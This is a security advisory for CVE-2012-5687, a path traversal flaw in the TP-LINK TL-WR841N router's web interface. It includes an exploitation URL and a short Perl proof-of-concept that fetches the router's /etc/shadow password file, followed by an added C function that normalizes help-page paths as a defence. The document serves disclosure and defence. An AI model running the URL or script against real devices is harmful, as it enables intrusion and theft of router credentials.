CyberSecurityNEPAL

CVE-2012-5687

Aug 13th, 2016
| Security Advisory - TP-LINK TL-WR841N LFI |=

Issue: TL-WR841N 300Mbps Wireless N Router by "TP-LINK"
Firmware Version: 3.13.9 Build 120201 Rel.54965n and below
Discovered Date: 24/10/2012
CVE-ID: CVE-2012-5687
Author: Matan Azugi [matan (at) madsec.co (dot) il]
Product Vendor: http://www.tp-link.com/en/products/details/?model=TL-WR841N

Details:

The TP-LINK TL-WR841N Wireless Router is prone to a Local File Inclusion (LFI) vulnerability.
The vulnerability exists in the web-based management interface. The URL parameter is not properly sanitized before being used.
Exploitation URL:

http://192.168.0.1/help/../../../../../../../../etc/shadow

Successful exploitation allows viewing the router configuration and password files.

Proof of Concept Code:

#TP-LINK TL-WR841N Shadow file grabber#
#built by Pulse matan (at) madsec.co (dot) il#
#enjoy#

use LWP::UserAgent;
$host = $ARGV[0];
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };

my $ua = LWP::UserAgent->new;
$ua->timeout(30);
$lfi = "/help/../../../../../../../../etc/shadow";
$url = $host.$lfi;
$request = HTTP::Request->new('GET', $url);
$response = $ua->request($request);
my $html = $response->content;
if($html =~ /root/) {
    print "root$' \n";
}

Thank You,
Matan Azugi, MCSE OSCP
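
The Details section attributes the flaw to a request path under /help/ that is used without being sanitized. As an added example (not code from the advisory or from TP-LINK's firmware), this C function shows one way a help-page handler could normalize the path and refuse anything that climbs out of its directory. `HELP_ROOT`, `resolve_help_path` and the sample file names are hypothetical, and the input is assumed to be already URL-decoded.

```c
#include <string.h>

/* Hypothetical document root for the help pages (an assumption). */
#define HELP_ROOT "/web/help"

/* Map an already URL-decoded request path ("/help/...") to a file under
 * HELP_ROOT. Returns 0 and fills out, or -1 if the path is malformed or
 * would resolve outside HELP_ROOT. Lexical only: no filesystem access. */
int resolve_help_path(const char *url_path, char *out, size_t outlen)
{
    static const char prefix[] = "/help/";
    char buf[256];
    size_t len = strlen(HELP_ROOT);
    int depth = 0;                       /* segments below HELP_ROOT */

    if (strncmp(url_path, prefix, sizeof(prefix) - 1) != 0)
        return -1;
    const char *rest = url_path + sizeof(prefix) - 1;
    if (strlen(rest) >= sizeof(buf) || len >= outlen)
        return -1;
    if (strchr(rest, '\\') || strchr(rest, '%'))
        return -1;                       /* refuse leftover encodings */
    strcpy(buf, rest);
    strcpy(out, HELP_ROOT);

    for (char *seg = strtok(buf, "/"); seg; seg = strtok(NULL, "/")) {
        if (strcmp(seg, ".") == 0)
            continue;
        if (strcmp(seg, "..") == 0) {
            if (depth == 0)
                return -1;               /* would climb above HELP_ROOT */
            *strrchr(out, '/') = '\0';   /* drop the last segment */
            len = strlen(out);
            depth--;
            continue;
        }
        size_t n = strlen(seg);
        if (len + 1 + n >= outlen)
            return -1;
        out[len] = '/';
        memcpy(out + len + 1, seg, n + 1);
        len += n + 1;
        depth++;
    }
    return depth > 0 ? 0 : -1;           /* a bare "/help/" names no file */
}
```

Because the check is lexical, a filesystem that contains symlinks under the help directory would also need the resolved path compared against the root with `realpath()` before the file is opened.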